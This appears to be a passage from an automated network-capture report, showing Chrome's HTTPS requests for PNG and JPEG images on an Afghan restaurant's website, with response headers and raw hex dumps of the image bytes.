                                                                                                                                                    2024-10-01 04:26:55 UTC16384INData Raw: 57 3a c1 8e 16 26 15 b4 64 68 07 00 6a b6 11 8f 0b 8c 79 6d 1b e4 5e fb 8d b7 da b0 55 da 97 74 69 9b 5c 6c af 6f 21 6d f2 79 53 8c d8 be f0 c5 74 0d d7 f1 54 58 d0 63 c0 ad 1e 7c b2 32 31 27 b1 e2 bf ec ed ae 93 18 47 13 c9 01 3e 52 0e 1a 5a f6 dd b1 be 2a a4 93 2b 3a 02 15 9c 4a bc 76 91 6d a0 fb b2 51 ab ab 3f 81 7d 2d 18 37 78 1c d2 09 e2 68 b0 6e de 47 64 a3 1b bd ad fa d5 1e 27 33 19 08 5e 22 4e b6 21 85 88 f7 ab 0d 90 f3 43 38 ce c4 3e 5c bc 1a dd 22 ac 25 f5 29 f9 52 e8 a6 2c 92 c1 6e 16 e2 e7 c4 b4 76 eb 74 92 7f a8 1d 1d 5f 06 8f 1f 9e 72 d9 01 90 cf 19 b3 88 f6 1d 18 39 ee f6 3d d6 f7 e8 bc e8 cc d6 56 20 3d c3 5b 89 b0 af 3f 83 91 c3 96 c3 2b 30 33 3b 12 4f 85 5b eb 6d ed 7e b5 5d 72 e1 94 ad 0a 07 b9 46 2a bb 8d fb 07 e2 ab ad b5 53 ed af 3e
                                                                                                                                                    Data Ascii: W:&dhjym^Uti\lo!myStTXc|21'G>RZ*+:JvmQ?}-7xhnGd'3^"N!C8>\"%)R,nvt_r9=V =[?+03;O[m~]rF*S>
                                                                                                                                                    2024-10-01 04:26:55 UTC16384INData Raw: 6b b6 e8 45 81 15 be e4 db fc b1 e7 1e d4 b7 63 a7 5d 2d 5d 5d b4 1c 74 4a c6 25 79 39 91 48 87 6b 6c 1a a8 d0 8a ec 19 5f 02 7d f1 f7 86 8c a6 ad 79 df fd 96 73 4d 1e e8 da 25 00 b0 e9 b7 c3 e2 aa 67 cb 39 92 19 9b c5 c7 4b 57 3b 6c d5 b8 f0 6f d5 6e eb ee 2e ff 00 aa e7 79 3e 5d 97 fe b7 4d bd da ea 12 c7 ca ef 1d b6 dd 6e 8b fb b5 d4 ef cd 6f fd a2 3f 1a f8 fe a3 ff d6 dd 62 3d d3 6f 51 a2 c5 57 62 3f de 58 f4 d5 80 a5 e8 7f 6c 0c da be e0 c8 0e 95 3d a8 48 4f 0a 32 b5 21 2c e1 ad 79 47 a8 f1 8f 2f e7 ac 15 7b 39 2b bd 47 59 ff 00 9a bd 62 36 d8 c1 ba 88 35 85 fc 52 c3 38 ab 07 31 8f 8c 12 d8 9f 85 a9 3b d4 d0 6e 8b 75 b9 42 f0 4a 88 55 4e d1 7b 9b f4 9f de a2 f0 95 14 5c 5c 97 eb 14 cc 58 23 7d 93 ca c7 cb 23 4b f5 9a b3 c5 8e 19 d9 09 24 85 24 1e b3
                                                                                                                                                    Data Ascii: kEc]-]]tJ%y9Hkl_}ysM%g9KW;lon.y>]Mno?b=oQWb?Xl=HO2!,yG/{9+GYb65R81;nuBJUN{\\X#}#K$$
                                                                                                                                                    2024-10-01 04:26:55 UTC16336INData Raw: 85 cf 71 7c e9 70 79 a1 2e af b8 c9 91 ee b1 1d a5 da bd de cf 72 bc e7 07 9a e5 bf 37 5c ec a7 dd 24 c5 91 fd 82 df cb 55 f0 a2 78 6b 46 7b 6c 76 80 2f d0 05 75 76 ff 00 fe 33 49 7d d2 8b d7 5f cb 97 8f a9 5f 04 5c df 2a 78 d2 29 24 97 cb 62 50 48 d6 16 1e 3f fd 3a d6 3c f3 99 9a 1c 80 b6 00 1e cb 5c 8f 79 5b f7 2a ae 3c e7 c5 70 4c 72 2b 70 0c 40 a9 60 8a 09 25 6c 94 36 99 81 0d 73 c6 81 ef ed fb 94 3f 05 ba 46 0b 7e 4d cc 64 e7 51 ba 4e a0 47 03 ed 53 d2 40 ef 6e a2 39 96 03 e5 44 64 82 db 50 d8 ad b8 fd 5a 8b 13 26 2e 55 8a b0 46 37 b1 37 70 a2 c7 5e d3 54 b8 fc ca 35 41 24 4d a3 13 68 ce 97 fa cb da db 56 eb 5d 98 b3 05 3b 55 cd 51 42 31 24 95 7b 2a 6c 0e be ca 9d 39 2c bb f6 02 aa 84 06 b9 3a 90 7d d5 ab 59 72 d6 69 cb 30 2a c6 da 71 a4 c7 c4 39 19
                                                                                                                                                    Data Ascii: q|py.r7\$UxkF{lv/uv3I}__\*x)$bPH?:<\y[*<pLr+p@`%l6s?F~MdQNGS@n9DdPZ&.UF77p^T5A$MhV];UQB1${*l9,:}Yri0*q9
                                                                                                                                                    2024-10-01 04:26:55 UTC48INData Raw: 38 54 72 44 7c 9d a7 43 6a b1 c8 16 22 f4 3c 9d ad 3a eb 2d eb f7 33 45 5f da 8a 92 85 d8 01 d3 46 ab ed b2 f5 53 56 33 bc 28 1c 2a 46 c6 d2 fd
                                                                                                                                                    Data Ascii: 8TrD|Cj"<:-3E_FSV3(*F
                                                                                                                                                    2024-10-01 04:26:55 UTC16384INData Raw: 26 94 93 1b 2b 81 c6 44 94 6c 1c 4d 09 36 13 30 21 34 a9 f1 f1 ca 5c b6 a7 a2 a6 d8 cc 0d 42 4c 70 43 14 06 35 b1 37 d2 a2 2f 63 a5 4d e6 f9 60 83 40 bc b6 23 da 6a a4 81 98 8b 72 d2 9e f1 36 1f 45 10 c3 78 bf 55 44 88 23 50 a3 e9 a9 54 96 16 a3 a8 16 71 92 43 12 6d 0c 6f 7e 8a 0e 69 02 3d 8f 0a 35 d6 e7 4e 16 aa fc b5 da 36 9b 6e eb aa b1 29 92 06 98 10 49 fc 95 5a d3 c8 26 11 f1 20 75 51 42 22 9a 93 7a 78 02 e0 1f c9 4a 1c 13 89 18 8c 96 6d 49 1f 9a ad b1 8e df 6d 50 30 6b dc 37 1a b1 c6 cb 0e 2e a7 81 b5 37 58 9d 8a 4b 09 9f 4a af f2 03 31 7b e8 78 d2 3e 52 ab 58 36 a6 ab b2 b9 9a 62 a9 12 b0 b9 ab d8 e4 9a eb 01 39 8b 1c 51 b4 84 f7 45 e8 38 b2 15 d0 32 9b 83 54 dc c7 9d ee c6 65 06 f7 20 58 74 8a 04 f3 74 8a 1b c5 a3 70 b7 55 37 4c ac 83 b1 76 c1 7b
                                                                                                                                                    Data Ascii: &+DlM60!4\BLpC57/cM`@#jr6ExUD#PTqCmo~i=5N6n)IZ& uQB"zxJmImP0k7.7XKJ1{x>RX6b9QE82Te XttpU7Lv{


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    129192.168.2.449896162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:55 UTC394OUTGET /assets/imgs/Banner_dineMenu_image2.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:55 UTC354INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:55 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 05 Apr 2023 14:05:02 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 1271200
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:55 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:55 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 14 00 00 02 04 08 06 00 00 00 68 97 a2 fd 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 41 db 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 0a 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 31 31 20 37 39 2e 31 35 38 33 32 35 2c 20 32 30 31 35 2f 30 39 2f 31 30 2d 30 31 3a 31 30 3a 32 30 20 20 20 20 20 20 20 20 22 3e 0a 20 20 20 3c 72 64 66
                                                                                                                                                    Data Ascii: PNGIHDRhpHYsAiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?><x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 "> <rdf
                                                                                                                                                    2024-10-01 04:26:55 UTC8192INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:55 UTC16384INData Raw: 8b d8 11 11 d2 d8 7d 35 4c 32 7b b4 4e 2e cf 49 11 7a 33 22 d0 5f ac 89 cb 8e 29 70 11 3b 30 e5 e6 c1 3e b7 f7 0e 38 3a 3b 61 6d 01 26 35 ea 2b 9e ea 66 bc 72 6d c6 4b 2f ee 30 39 55 be fd 60 c1 5f 0b c7 dc 9c 34 fc 6b 1f ff 22 6f 74 e7 bc b6 38 63 62 46 f0 0e e7 14 ef 1d 73 e7 89 95 70 56 2b 7b 9d b0 4e 91 9b 37 ae f1 b3 2f fd 61 5e ee 13 ff df c3 b7 78 e0 02 ba 3b 45 62 85 2c 5a 3e 5e cd b8 7d eb 69 dc fa 82 d7 56 27 2c 1c b4 5d c7 f7 cf 4e 78 6b 71 cc b3 17 6b 5e 9a de e1 63 d3 03 7e 63 f5 88 b7 52 c7 8e 78 66 e6 88 40 47 24 90 70 d1 50 51 6e 4e 66 bc 5c ed f2 c1 f9 11 4b d7 43 df f3 54 54 3e 75 f5 0e 6f 2f 0e 39 92 9e 2f ba 39 cf 5d bb c5 fd 47 0f 59 91 b8 72 e5 80 b7 4f 8f 39 5f b7 54 95 67 16 5b 76 13 3c 73 ed 36 d2 05 be 7f f4 80 ef 1d 1d 71 dc b7
                                                                                                                                                    Data Ascii: }5L2{N.Iz3"_)p;0>8:;am&5+frmK/09U`_4k"ot8cbFspV+{N7/a^x;Eb,Z>^}iV',]Nxkqk^c~cRxf@G$pPQnNf\KCTT>uo/9/9]GYrO9_Tg[v<s6q
                                                                                                                                                    2024-10-01 04:26:55 UTC16384INData Raw: a6 13 62 4a 12 43 b2 3e f6 43 43 c1 d4 b9 3c a1 62 bc 34 c5 e5 09 0f 45 cd 21 d5 40 54 b0 d4 f7 a6 66 3e a9 56 46 0e 4c 34 13 cd 12 fa 14 cd a9 33 a7 4e 73 40 6c 22 a4 20 95 af 55 55 23 66 38 ef b2 05 4e 88 48 76 98 a6 72 0e e7 50 27 d9 8e ee da ee d4 54 61 d2 78 dc d4 d9 f9 69 cf c3 e3 15 7d 2c de a2 7d 37 3e c3 39 05 38 17 7d 7d 17 54 54 53 5d 57 69 67 36 e1 d7 7f ed bf b6 b6 5b 4b 1f 7a 4b 66 92 52 2c 69 bf 25 50 c9 72 d0 44 01 d2 64 8b 9d 6c 03 3b b6 ac 0b 03 0b 4c 06 67 57 95 31 e5 35 0d d2 cf a1 00 34 a3 48 99 47 7f bc ec 38 98 4a 96 ab c5 72 a8 76 2a 82 65 19 b6 31 c8 91 37 67 12 46 0c 50 c7 74 27 23 7f 8c fc 9c 62 d8 c0 62 1d 2b cc 8c 95 a7 02 f0 8e 0c 45 2b 2c e1 42 43 53 11 49 31 84 71 b1 cd 01 4e 32 7e 4f 44 6c e0 e9 6d f8 68 5b 18 9b 99 a8 ba
                                                                                                                                                    Data Ascii: bJC>CC<b4E!@Tf>VFL43Ns@l" UU#f8NHvrP'Taxi},}7>98}}TTS]Wig6[KzKfR,i%PrDdl;LgW154HG8Jrv*e17gFPt'#bb+E+,BCSI1qN2~ODlmh[
                                                                                                                                                    2024-10-01 04:26:55 UTC16384INData Raw: 89 66 38 5b ab ba 82 00 95 75 9c 77 6b 8c 38 a6 ae a2 dd f4 9c 1e 9d f2 c2 9b b7 11 57 61 86 e6 43 b0 8d 41 09 74 eb 16 05 26 7b 3b 54 bb 3b 18 e3 20 a6 f8 e8 64 3e c7 ee 59 ce 9e 1c 73 fe e8 88 9d 5b 37 50 9f 62 6b b6 31 a9 45 dd c7 a1 bd b9 6a aa 61 3a 2c d6 d0 b7 2d be 4b 8b 0a df 07 ba 75 a0 6b 53 bb ee c1 de 14 6b e0 ab 77 cf 89 cd 02 e6 91 d3 75 a4 46 41 3d 9b a0 3c 59 ae e9 8c e5 9a cc 58 ad 5b 36 a7 17 74 1b 41 63 c5 ee 7c 82 6b 94 7e ed 71 22 2c 9a 8a 10 22 9b 36 fd bc c6 59 e6 93 1a df 75 f4 22 d4 95 23 44 a5 f7 7d fa ac 7b 3b 0c 61 d6 ab 0d 20 f8 18 70 c6 b1 3f 9f d3 76 1d 9d ef 71 ea 52 ef 7d ef a9 1b c7 bc ae 92 3b 53 61 93 63 b6 d3 ba 26 dd 70 02 9b ae e3 a4 15 8e 97 eb f4 73 1e 05 aa 99 c1 d8 29 6d 6f a1 99 61 aa 1e 2a 03 b5 60 9b 86 ba 72
                                                                                                                                                    Data Ascii: f8[uwk8WaCAt&{;T; d>Ys[7Pbk1Eja:,-KukSkwuFA=<YX[6tAc|k~q","6Yu"#D}{;a p?vqR};Sac&ps)moa*`r
                                                                                                                                                    2024-10-01 04:26:55 UTC16331INData Raw: 05 99 dd a1 97 03 c2 ec 90 be 30 84 6c c7 c9 a6 83 0d 18 75 b8 e0 b8 a8 6a 6a 76 78 e3 0b 9f e3 a7 6e ae 79 ef fe 97 39 6e 0f 50 5f b3 1b 1d e7 62 79 ef f8 0c f9 fe 5b 54 ea 88 da b3 f6 3d ab ae e5 c6 ee 0d 66 d7 0e 38 fa 7b bf c6 57 bf fe 0d 26 b3 86 37 5e 7d 99 2f 7e ef 5b d8 ae e7 67 fe d0 cf d0 9d 3d e1 ab f7 df e1 95 76 17 bb 6c f8 e9 c5 01 01 e5 57 8e 9e 60 dc 84 a6 a9 e9 42 c4 06 c5 19 a1 11 97 ec ef 29 c6 45 ec 3d 93 c9 8c 28 86 87 fe 82 93 8b 13 ea bd 3d 5e ba 7e c8 e3 93 13 36 7d cf 03 bf e2 a4 aa 38 ba 76 c0 7f 7c fc 88 2f bc fd 0e ff f0 e1 a7 f9 95 a3 f7 f8 95 a3 b7 78 bd ba ce cf 4f 9f e3 ad f6 fb 74 21 d0 58 4b 00 ba 18 38 d3 9e 8d 6f 39 74 96 5b fb 87 fc 9f 1f bd c5 4f 85 0d 7f 64 ff 25 de ba 38 e7 b7 fa 15 0f 2a e5 db 4d e0 8d 76 c3 1b f5
                                                                                                                                                    Data Ascii: 0lujjvxny9nP_by[T=f8{W&7^}/~[g=vlW`B)E=(=^~6}8v|/xOt!XK8o9t[Od%8*Mv
                                                                                                                                                    2024-10-01 04:26:55 UTC16384INData Raw: 39 da d9 e3 7f 7a e3 9b 34 40 5b c0 af dc 7a 87 fd ca f2 d1 62 c2 24 06 ee 1c 9f d1 44 cf 73 47 57 b8 5c 9e f3 f0 7c 8e 13 a5 55 a5 d3 48 5d 55 44 eb 98 14 05 87 bb 63 3a d3 51 55 35 d6 0a 65 55 62 cb 7a 2b d2 92 62 87 de af f0 ab 06 67 0d f8 dc 7a 6f 1d b6 2c b0 65 49 ec 9b c4 7d ad 2a 62 14 ba c6 a7 b2 10 14 7c 02 5c 47 9f 36 1e d1 7b da 79 83 d8 54 84 a5 21 b9 90 08 69 3a e8 aa 34 95 6c db 1e 17 0d 5d a7 34 4b cf 68 cf 51 d7 35 31 78 42 db f1 e4 93 47 30 bd c1 fc ef fe 16 57 2e 5d e5 89 17 9e e6 cd af 7f 9d de 47 be f2 b5 6f 31 1a ef e2 7d 64 5c 38 ba 36 12 51 9e ba 71 85 17 9e 79 2a 7d 7f a1 a7 ae 0a 2a eb 98 af 96 68 61 08 04 9c 85 8b f9 32 c7 bf f7 58 2c 3a ba 4e 79 ef f4 8c eb 57 8e f0 cb 15 0f cf 1e 52 16 8e 10 3b 3c 91 55 63 70 9e e4 b4 6e 3a 00
                                                                                                                                                    Data Ascii: 9z4@[zb$DsGW\|UH]UDc:QU5eUbz+bgzo,eI}*b|\G6{yT!i:4l]4KhQ51xBG0W.]Go1}d\86Qqy*}*ha2X,:NyWR;<Ucpn:
                                                                                                                                                    2024-10-01 04:26:55 UTC16384INData Raw: 6f a1 ef 05 bf 8a b4 8b 48 ec 1d ed c2 70 7a d6 f1 f8 d1 92 e3 e3 25 57 76 f6 78 fa b0 62 5c 0a c7 8f ce 58 ce 3b ce 67 0d 67 27 17 a8 42 e9 84 c9 c4 70 fd fa 2e cf bd 78 9d 67 9f b9 c1 ce ee 0e 0f 4f 67 9c cd 3a 66 e7 0b 3e 5e 8f f9 bd 1f fd 10 8f 1f 9f f2 ea bd 13 f6 6e dd e4 fe e5 05 75 15 d8 1f 29 a6 e9 78 e9 e9 8a 1b 4f 5d d0 5e de c5 b9 80 c1 a1 c6 52 ed 8d e9 83 e3 f3 5f 38 e5 17 bf 76 49 17 c6 c9 09 28 d9 85 82 5d 0b 7b 4f 50 eb 64 e3 cc db 8e 20 6f aa 3e 9e 40 aa 6c 45 9b 65 5d cc 9e 6a bb 0d 5e 23 d1 64 0a 73 6e eb 16 93 16 f0 84 b4 18 24 c7 54 ad 4b ae 53 f1 01 0d 91 51 3d e2 c3 1f 7a 81 6f 7e f9 15 bc f6 44 7a 46 55 c5 f1 e9 23 fa 66 c5 ee ee 88 50 58 56 8d a7 1c 55 34 5d cb e5 62 49 35 1e 51 ef d4 74 4d cf 8e ab b8 75 e5 90 8b cb 19 6d b3 4a
                                                                                                                                                    Data Ascii: oHpz%Wvxb\X;gg'Bp.xgOg:f>^nu)xO]^R_8vI(]{OPd o>@lEe]j^#dsn$TKSQ=zo~DzFU#fPXVU4]bI5QtMumJ
                                                                                                                                                    2024-10-01 04:26:55 UTC8245INData Raw: c5 f1 8c cb c7 33 2e 5f bd c7 a9 03 19 a5 fe 58 1a a8 4b 8b 2d 4a 7c d3 a7 8d 6b af 14 a9 b4 32 2d 76 b7 17 a5 83 8b 2b bb 61 12 c1 5d b7 44 b3 7f fd ce c4 6f f4 c3 ac 1b d4 d2 22 59 8c 21 9a 48 db 74 38 6b 79 e6 d6 35 2e cf 72 7c 79 52 b3 98 35 f4 4d 43 f4 3d f3 45 c5 72 b5 a2 ed 3b ac 11 ae 1e ee 61 50 56 cb 15 3b 7b 23 6e 5c bf cd 0d e3 21 78 ba d0 53 ec 4f 19 d7 25 2f bf f0 34 4e 84 fb 0f 4e f9 d2 69 c3 3b a7 17 dc 7f 74 42 1f 2d 5d 88 54 b1 e0 fa d5 ab 88 b1 2c 66 0d 4d d3 d2 07 52 b1 77 76 1a 6c 04 d5 8d 50 07 a9 af ce 16 05 ce 1a 86 08 e2 72 b5 ca 7b 4a 93 a8 90 eb 8d 8b 4d 46 a5 81 ec 6c 0c b6 2c 11 1f 20 42 4f 8a 95 b9 d2 65 c0 5b 20 d5 b1 e7 0d 98 31 84 3e 24 22 64 8e d9 27 37 91 6e 77 d6 3d 61 80 4b ce a0 b4 49 73 85 6c 79 1a 7e 2d ff e8 d6 6f
                                                                                                                                                    Data Ascii: 3._XK-J|k2-v+a]Do"Y!Ht8ky5.r|yR5MC=Er;aPV;{#n\!xSO%/4NNi;tB-]T,fMRwvlPr{JMFl, BOe[ 1>$"d'7nw=aKIsly~-o
                                                                                                                                                    2024-10-01 04:26:55 UTC16384INData Raw: 0d 79 b8 9b b8 ae 9e 11 13 f1 51 89 c1 28 45 8e 78 0f 90 73 49 ee 67 87 65 d9 78 7c 08 54 d5 2e 65 61 69 33 78 2a 75 18 3a ca 22 ad 0b 7d 48 1d ec d6 d9 34 77 f8 88 a7 a7 74 8e 18 83 76 3e a4 2a 32 9b f6 ff 7d ef e9 1e 5d 10 7c de f7 e6 0e 46 1f e3 26 db 3d c4 98 b3 60 28 b9 5a 2e bd e3 fa 3c de 65 bb 0c 64 ed d6 5c 03 e9 74 d3 05 63 8c 5b 43 75 93 7e 93 aa dd 54 b6 12 cf 31 41 66 74 48 51 48 c8 8b 8a 74 0f 4c be 36 6b e2 b3 4f e6 29 dd 02 2a 85 18 28 7e 8d 35 d7 6f fc f8 75 20 28 ae 2e 7a 7a 60 67 74 95 30 fd 6e d8 0f b8 f6 84 fd 3b 9f 60 f4 e2 4d de 79 e5 3a 37 7e c7 7f 42 ff 5f 7f 9c f9 cf fd 9f 89 17 5f c3 d2 50 c4 15 05 1e 23 47 14 e3 92 a6 99 71 fc ee cf 71 fc fe e7 b1 b6 a4 af f7 28 8a 31 85 00 24 57 56 88 3d 21 fa 7c 30 1b 73 97 16 9b 45 a0 f6 09
                                                                                                                                                    Data Ascii: yQ(ExsIgex|T.eai3x*u:"}H4wtv>*2}]|F&=`(Z.<ed\tc[Cu~T1AftHQHtL6kO)*(~5ou (.zz`gt0n;`My:7~B__P#Gqq(1$WV=!|0sE


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    130192.168.2.449898162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:56 UTC389OUTGET /assets/imgs/food_menu_vegfood.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:56 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:56 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 05 Apr 2023 14:05:52 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 17444
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:56 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:56 UTC16032INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 46 00 00 00 31 08 06 00 00 00 67 09 df fd 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 3b 6a 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 0a 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 31 31 20 37 39 2e 31 35 38 33 32 35 2c 20 32 30 31 35 2f 30 39 2f 31 30 2d 30 31 3a 31 30 3a 32 30 20 20 20 20 20 20 20 20 22 3e 0a 20 20 20 3c 72 64 66
                                                                                                                                                    Data Ascii: PNGIHDRF1gpHYs;jiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?><x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 "> <rdf
                                                                                                                                                    2024-10-01 04:26:56 UTC1412INData Raw: d2 36 49 9f 91 74 8a 9f f7 49 7a c9 20 2f 4a f7 7a fc 04 49 3b 62 9b 5e 2b a9 d1 48 78 48 50 9f 92 f4 13 03 c3 dd 56 f7 75 81 2d b5 36 50 ff 89 72 11 26 fa f0 4f bd a8 7d 92 0e 06 9b b8 32 c3 b8 27 dc fe 49 ff c2 fb fd de 26 e9 1b 92 66 b8 dc e0 fe 77 05 73 be 2b e9 5c d7 cf 71 dd f7 fd 3e db ef 2b 24 25 cb 89 7c 05 0c 05 6e 06 0e 01 1f 0a da 5a 80 55 b1 fe bd 81 a9 c0 11 bf ef 06 26 03 a7 f9 bd c3 b2 e4 2f c0 d9 c0 77 80 31 81 fc 10 70 0a 30 cf 42 7e 8c eb af b5 ac 19 ec f7 4f 01 d7 5b cd 97 4d c6 cc 08 dc 0a d7 4b 6a 09 7e dd 55 92 6e 93 34 ce 96 72 a5 a4 45 41 7b 9d 2d e6 30 1d 36 aa 3d e0 f7 89 92 2e 09 8e 51 b6 74 5c d2 52 97 7f 51 6e 5b e9 0c 3f a7 5a 15 d7 00 33 fd 7e a9 73 c4 0d 1b 80 46 a0 d5 40 ed 5b d6 58 a9 40 93 f4 b1 6a 8e 38 64 92 b9 28 9b
                                                                                                                                                    Data Ascii: 6ItIz /JzI;b^+HxHPVu-6Pr&O}2'I&fws+\q>+$%|nZU&/w1p0B~O[MKj~Un4rEA{-06=.Qt\RQn[?Z3~sF@[X@j8d(


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    131192.168.2.449897162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:56 UTC384OUTGET /assets/imgs/img_recipe_3.jpg HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:56 UTC353INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:56 GMT
                                                                                                                                                    content-type: image/jpeg
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 20:58:54 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 77762
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:56 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
